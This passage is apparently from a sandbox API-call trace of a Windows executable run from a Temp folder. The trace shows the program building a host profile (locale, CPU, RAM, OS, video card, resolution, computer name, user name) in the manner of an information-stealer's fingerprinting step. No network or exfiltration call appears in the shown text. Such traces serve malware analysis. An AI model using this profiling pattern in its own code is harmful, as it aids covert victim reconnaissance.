19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\n", lpString2="Installed RAM: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: " [0175.789] GetProcessHeap () returned 0x4c0000 [0175.789] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x4ec008 [0175.789] GlobalMemoryStatusEx (in: lpBuffer=0x1987a0 | out: lpBuffer=0x1987a0) returned 1 [0175.789] wsprintfA (in: param_1=0x4ec008, param_2="%d MB" | out: param_1="4096 MB") returned 7 [0175.789] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: ", lpString2="4096 MB" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB" [0175.789] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n" [0175.789] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\n", lpString2="OS: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: " [0175.789] GetProcessHeap () returned 0x4c0000 [0175.789] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x4ec118 [0175.789] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x1987ec | out: phkResult=0x1987ec*=0x254) returned 0x0 [0175.789] RegQueryValueExA (in: hKey=0x254, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x4ec118, lpcbData=0x1987e8*=0xff | out: lpType=0x0, lpData=0x4ec118*=0x57, lpcbData=0x1987e8*=0xf) returned 0x0 [0175.790] RegCloseKey (hKey=0x254) returned 0x0 [0175.790] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: ", lpString2="Windows 10 Pro" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro" [0175.790] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro", lpString2=" (" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (" [0175.790] GetCurrentProcess () returned 0xffffffff [0175.790] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x1987ec | out: Wow64Process=0x1987ec*=1) returned 1 [0175.790] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (", lpString2="x64" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64" [0175.790] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64", lpString2=" Bit)" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)" [0175.790] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n" [0175.790] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\n", lpString2="Videocard: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: " [0175.790] EnumDisplayDevicesA (in: lpDevice=0x0, iDevNum=0x0, lpDisplayDevice=0x198648, dwFlags=0x1 | out: lpDisplayDevice=0x198648) returned 1 [0175.858] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: ", lpString2="Microsoft Basic Display Adapter" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter" [0175.859] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n" [0175.859] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\n", lpString2="Display Resolution: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: " [0175.859] CreateDCA (pwszDriver="DISPLAY", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xc0100ae [0175.859] GetDeviceCaps (hdc=0xc0100ae, index=8) returned 1440 [0175.859] GetDeviceCaps (hdc=0xc0100ae, index=10) returned 900 [0175.859] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1 [0175.859] wsprintfA (in: param_1=0x1986d8, param_2="%dx%d" | out: param_1="1440x900") returned 8 [0175.859] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: ", lpString2="1440x900" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900" [0175.859] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n" [0175.859] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\n", lpString2="PC name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: " [0175.859] GetProcessHeap () returned 0x4c0000 [0175.859] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x4ec228 [0175.860] GetComputerNameA (in: lpBuffer=0x4ec228, nSize=0x1987e8 | out: lpBuffer="XC64ZB", nSize=0x1987e8) returned 1 [0175.860] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: ", lpString2="XC64ZB" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB" [0175.860] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n" [0175.860] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\n", lpString2="User name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: 